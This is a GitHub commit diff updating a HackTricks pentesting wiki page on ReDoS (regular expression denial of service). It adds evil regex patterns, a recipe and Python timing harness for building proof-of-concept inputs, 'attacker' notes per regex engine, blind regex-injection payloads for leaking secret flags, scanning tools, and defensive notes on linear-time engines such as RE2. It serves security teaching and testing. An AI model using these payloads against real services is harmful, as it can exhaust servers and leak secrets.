Skip to content

Commit 8807c23

Browse files
authored
Merge pull request #1453 from HackTricks-wiki/research_update_src_pentesting-web_regular-expression-denial-of-service-redos_20251001_082618
Research Update Enhanced src/pentesting-web/regular-expressi...
2 parents cd60902 + 58ca1e4 commit 8807c23

File tree

1 file changed

+55
-8
lines changed

1 file changed

+55
-8
lines changed

src/pentesting-web/regular-expression-denial-of-service-redos.md

Lines changed: 55 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad
88

99
## The Problematic Regex Naïve Algorithm
1010

11-
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
11+
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
12+
13+
### Engine behavior and exploitability
14+
15+
- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
16+
- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
1217

1318
## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>
1419

@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
1823
- ([a-zA-Z]+)\*
1924
- (a|aa)+
2025
- (a|a?)+
21-
- (.\*a){x} for x > 10
26+
- (.*a){x} for x > 10
2227

2328
All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
2429

30+
### Practical recipe to build PoCs
31+
32+
Most catastrophic cases follow this shape:
33+
34+
- Prefix that gets you into the vulnerable subpattern (optional).
35+
- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
36+
- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).
37+
38+
Minimal examples:
39+
40+
- `(a+)+$` vs input `"a"*N + "!"`
41+
- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`
42+
43+
Increase N and observe super‑linear growth.
44+
45+
#### Quick timing harness (Python)
46+
47+
```python
48+
import re, time
49+
pat = re.compile(r'(\w*_)\w*$')
50+
for n in [2**k for k in range(8, 15)]:
51+
s = 'v' + '_'*n + '!'
52+
t0=time.time(); pat.search(s); dt=time.time()-t0
53+
print(n, f"{dt:.3f}s")
54+
```
55+
2556
## ReDoS Payloads
2657

2758
### String Exfiltration via ReDoS
@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (
3061

3162
- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
3263
- Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
33-
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
64+
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
3465
- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
3566

3667
### ReDoS Controlling Input and Regex
@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
6798
*/
6899
```
69100

101+
### Language/engine notes for attackers
102+
103+
- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
104+
- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
105+
- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
106+
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.
107+
70108
## Tools
71109

72110
- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
111+
- Find vulnerable regexes and auto‑generate evil inputs. Examples:
112+
- `pip install regexploit`
113+
- Analyze one pattern interactively: `regexploit`
114+
- Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/`
73115
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
116+
- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
117+
- End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
118+
- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
119+
- Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.
120+
121+
> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.
74122
75123
## References
76124

77-
- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
125+
- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
78126
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
79-
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
127+
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
80128
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
129+
- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
130+
- Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)
81131

82132
{{#include ../banners/hacktricks-training.md}}
83-
84-
85-

0 commit comments

Comments
 (0)